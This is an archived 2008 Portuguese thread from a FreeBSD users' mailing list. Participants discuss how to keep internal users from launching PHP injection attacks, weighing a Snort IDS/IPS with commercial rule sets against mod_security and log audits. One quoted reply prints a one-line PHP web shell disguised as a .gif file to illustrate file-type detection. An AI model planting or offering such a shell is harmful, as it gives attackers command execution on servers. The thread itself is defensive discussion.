[FUG-BR] OT-Ataque PHP injection

Marcelo M. Fleury marcelomf em gmail.com
Sexta Fevereiro 22 12:51:30 BRT 2008


Bom,
Patrick, você está certo :), obrigado pelo post explicativo, tanto tempo sem
mexer no snort ou em qualquer ids/ips, me fez confundir as bolas xD.

[]s
Em 22/02/08, Patrick Tracanelli <eksffa em freebsdbrasil.com.br> escreveu:
>
> Patrick Tracanelli escreveu:
>
> > Marcelo M. Fleury escreveu:
> >> Olá,
> >>
> >> até onde eu entendi, o interesse da Cristina é em não ser uma provedora
> de
> >> códigos maliciosos, no caso PHP.
> >
> > Então entendemos coisas distintas. Ao meu ver ela nao quer q usuarios
> > internos façam ataque de injection em qualquer q seja o destino/alvo.
>
>
> Ou melhor, *não* façam.
>
>
> >
> >> Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de
> ataques
> >> a rede/host, e sim de que a rede ou host seja uma provedora de
> ataques...
> >
> > E qual é a diferença? Sendo um IDS de rede, sua função é filtrar os 2
> > fluxos, o que sai e o que entra na/da rede. Ainda não entendi a
> > relutancia hehe.
> >
> >   na
> >> realidade não conheço solução voltada para isso... existe o
> mod_security
> >
> > A solução é o IPS/IDs hehe ;)
> >
> > O mod_security é fantastico, mas não se aplica, nem de longe, ao que ela
> > quer. O mod_security é o mais indicado pra proteger exclusivamente o
> > Apache local. É um DSO e como tal roda no mesmo nível do httpd. Portanto
> > sequer, é capaz de identificar padrões iniciados da maquina com
> > mod_security para outros destinos. Apenas quando o destino final é o
> > Apache (serviço httpd).
> >
> > do
> >> apache que pode te ajudar a monitorar e filtrar suas aplicações.
> >>
> >> Penso em algum programa que cheque a integridade de arquivos no
> servidor,
> >> algo parecido com o file:
> >>
> >> marcelo em mmf:~$ cat sh.gif
> >> <?php
> >>         system($_GET['sh']);
> >> ?>
> >> marcelo em mmf:~$ file sh.gif
> >> sh.gif: PHP script text
> >>
> >> e depois, habilitar alguns filtros no mod_security buscando checar
> qualquer
> >> uso indevido do php... confesso que não conheço muito o mod_security,
> uma
> >> vez que não trampo mais como sysadmin e sim como desenvolvedor(quero
> arrumar
> >> um tempo para brincar com ele).
> >>
> >> Acredito que no mais é realizar auditorias... procurar nos logs do
> apache
> >> por qualquer comando... estilo uname, id, ls ... nada que o
> cat,grep,awk não
> >> resolva!
> >
> > Eu discordo plenamente. Olhar logs é forense. Segurança tem que ser
> > pro-ativa.
> >
> > E pelo que entendi na situação da Cristina ela não terá logs do Apache
> > ou PHP pra olhar, ja que ela quer evitar que ataques sejam provenientes
> > de seu ambiente, nao destinados a ele (ou pelo menos ambos os casos).
> >
> >> Espero ter ajudado, boa sorte!
> >>
> >>
> >> Em 22/02/08, William Grzybowski <william88 em gmail.com> escreveu:
> >>> Oi Patrick,
> >>>
> >>> Não sei se entendi muito bem, poderia me dar uma luz?
> >>> Php injection, como próprio nome ja diz é a inserção de codigo php
> >>> causado por código mal escrito que permito o injeção de código php
> >>> externo no servidor, correto?
> >>>
> >>> Como que funcionam essas regras que você falou? Essas empresas liberam
> >>> regras que atuam (obviamente) na ""camada"" do HTTP e analizam o
> >>> trafego para os softwares vulneraveis que eles tem conhecimento e
> >>> inclusao direta de scripts em servidores externos?
> >>>
> >>> Vlw
> >>>
> >>> 2008/2/21 Patrick Tracanelli <eksffa em freebsdbrasil.com.br>:
> >>>
> >>>> Cristina Fernandes Silva escreveu:
> >>>>
> >>>>> É cobrada essas regras ? Vc tem alguma faixa de preço  ? é
> apllicance
> >>>>  > ? ou somente as regras que posso usar no snort.
> >>>>
> >>>>  Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
> >>>>  precos. Eles confiam no que voce diz: Se voce diz que é pequeno
> porte,
> >>>>  não importa se é uma multinacional, pagara como pequeno. No site da
> >>>>  SourceFire tem todos os detalhes sobre preços.
> >>>>
> >>>>  São só as regras a principio, mas pode comprar o sistema deles. Não
> >>>>  conheço quem use no país o sistema deles. Mas não parece ser mais do
> >>> que
> >>>>  o Snort com um front-end muito amigável.
> >>>>
> >>>>  No caso da Juniper tem direito automaticamente a versão convertida
> pra
> >>>>  Snort todos que tem Juniper série 5000 e já pague a licença anual do
> >>> IPS
> >>>>  (que é um add-on no firewall Juniper).
> >>>>
> >>>>  No Brasil quem representa a venda das assinaturas Source Fire é a
> >>>>  BRConnection.
> >>>>
> >>>>
> >>>>
> >>>>  >
> >>>>  >
> >>>>  >
> >>>>  > Em 21/02/08, Patrick Tracanelli<eksffa em freebsdbrasil.com.br>
> >>> escreveu:
> >>>>  >> Cristina Fernandes Silva escreveu:
> >>>>  >>
> >>>>  >>> Acho que não fui clara, Vou explicar,
> >>>>  >>  >
> >>>>  >>  > Quero evitar que alguem da minha rede use o meu ip  (endereço
> )
> >>> para
> >>>>  >>  > fazer ataques
> >>>>  >>  > de php injection para outro endereço externo. Até mesmo os
> meus
> >>>>  >>  > usuarios interno fazer algum ataque para servidores externos..
> >>>>  >>
> >>>>  >>
> >>>>  >> Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O
> nível
> >>> de
> >>>>  >>  satisfação vai depender da qualidade das regras de análise de
> >>> instrusão
> >>>>  >>  que você utilizar. Isso quer dizer que dependendo do nível de
> >>> seriedade
> >>>>  >>  da empresa será proveitoso assinar um serviço (comercial) que
> >>> oferece
> >>>>  >>  regras testadas e atualizadas. Apesar da escolha natural ser
> Source
> >>>>  >>  Fire, minha escolha pessoal (e sugestão) é pelas regras
> fornecidas
> >>> pela
> >>>>  >>  Juniper. São as mesmas utilizadas no Juniper série 5000,
> >>> convertidas pro
> >>>>  >>  Snort.
> >>>>  >>
> >>>>  >> -------------------------
> >>>>  >>  Histórico: http://www.fug.com.br/historico/html/freebsd/
> >>>>  >>  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>>>  >>
> >>>>  > -------------------------
> >>>>  > Histórico: http://www.fug.com.br/historico/html/freebsd/
> >>>>  > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>>>
> >>>>  -------------------------
> >>>>  Histórico: http://www.fug.com.br/historico/html/freebsd/
> >>>>  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>>>
> >>>
> >>>
> >>> --
> >>>
> >>> William Grzybowski
> >>> ------------------------------------------
> >>> Jabber: william88 at gmail dot com
> >>> Curitiba/PR - Brazil
> >>> -------------------------
> >>>
> >>> Histórico: http://www.fug.com.br/historico/html/freebsd/
> >>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >>>
> >>
> >>
> >
> >
>
>
> --
> Patrick Tracanelli
>
> FreeBSD Brasil LTDA.
> Tel.: (31) 3516-0800
> 316601 em sip.freebsdbrasil.com.br
> http://www.freebsdbrasil.com.br
> "Long live Hanin Elias, Kim Deal!"
>
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>



-- 
Att, Marcelo M. Fleury
Linux User: #369521
Blog - http://marcelomf.blogspot.com/

"Não basta saber, é preciso também aplicar; não basta querer é preciso
também agir" By Goethe


Mais detalhes sobre a lista de discussão freebsd